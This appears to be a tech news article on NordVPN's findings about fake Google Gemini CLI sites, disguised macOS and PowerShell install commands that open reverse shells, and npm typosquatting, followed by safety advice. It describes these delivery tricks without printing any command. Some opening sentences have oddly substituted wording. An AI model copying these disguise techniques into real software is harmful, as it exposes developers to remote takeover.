NordVPN has uncovered a collection of energetic malicious campaigns impersonating the official Google Gemini Command-Line Interface (CLI).
Attackers are creating faux web sites, cloned repositories, and misleading social media posts to trick builders and different customers into putting in what seems to be an unofficial or early-access model of Gemini’s developer software.
However as a substitute of delivering reliable software program, the campaigns distribute a reverse shell, giving the attacker full and unrestricted distant management over the compromised machine, with no additional motion required on their finish.
“The payloads being delivered here grant full remote access to a victim’s machine, which makes this a serious threat regardless of how technically sophisticated the target is.”
The attack has both MacOS and Windows versions. On MacOS, it starts with a convincing clone of the official Google Gemini CLI web page. This instructs the user to run an innocuous-looking command in their terminal.
However, this command is encoded in the Base64 simple text encoding format, obscuring what it actually does.
“Once decoded, the command downloads a malicious script from a remote server and immediately runs it with the highest administrative privileges available on the system,” the researchers said.
“It means the attacker’s code can read, modify, or delete any file on the device, install additional malware, or use the compromised Mac as a launchpad to access corporate networks the device is connected to.”
As for the Windows variant, this uses a different delivery method. A PowerShell command, disguised with variable names like $Install=’GeminiCLI’ to look like a legitimate software setup process, connects to a remote server and executes malicious code directly in the device’s memory.
Running code in memory rather than writing it to disk – a fileless attack – evades traditional antivirus software that scans files for known threats.
As well as these direct attacks, NordVPN’s researchers also found a typosquatting operation targeting the npm ecosystem. Fake package names, including gemini/cli and gemini-cli, were registered or under preparation to mimic the official google/gemini-cli package.
“The strategy exploits a common habit among developers of omitting the organization prefix when searching for or installing packages,” the researchers warned.
“Although the fake package had not yet appeared in the npm registry at the time of analysis, its preparation signals an active and imminent threat. Once published, any developer who installs it by mistyping the package name could unknowingly execute malicious code.”
How to stay safe
NordVPN advised users to be wary of any website, forum post, or social media message offering early or unofficial access to developer tools. They should stick to official sources – and, in this case, that’s just the official Google repository.
Never run a terminal or PowerShell command you didn’t write yourself unless you fully understand what it does, the firm warned, pointing out that legitimate software installers don’t ask users to copy and paste commands from a webpage.
Similarly, developers should verify package names in full before installation, including the organization prefix – the official package is google/gemini-cli, not gemini/cli or gemini-cli.
Nord also adviased using security software that includes behavioral detection, not just file-based scanning. Fileless attacks are specifically engineered to bypass traditional antivirus tools.
ITPro approached Google for comment, but did not receive a response by time of publication.
FOLLOW US ON SOCIAL MEDIA
Follow ITPro on Google News and add us as a preferred source to maintain tabs on all our newest information, evaluation, views, and evaluations.
You can even follow ITPro on LinkedIn, X, Facebook, and BlueSky.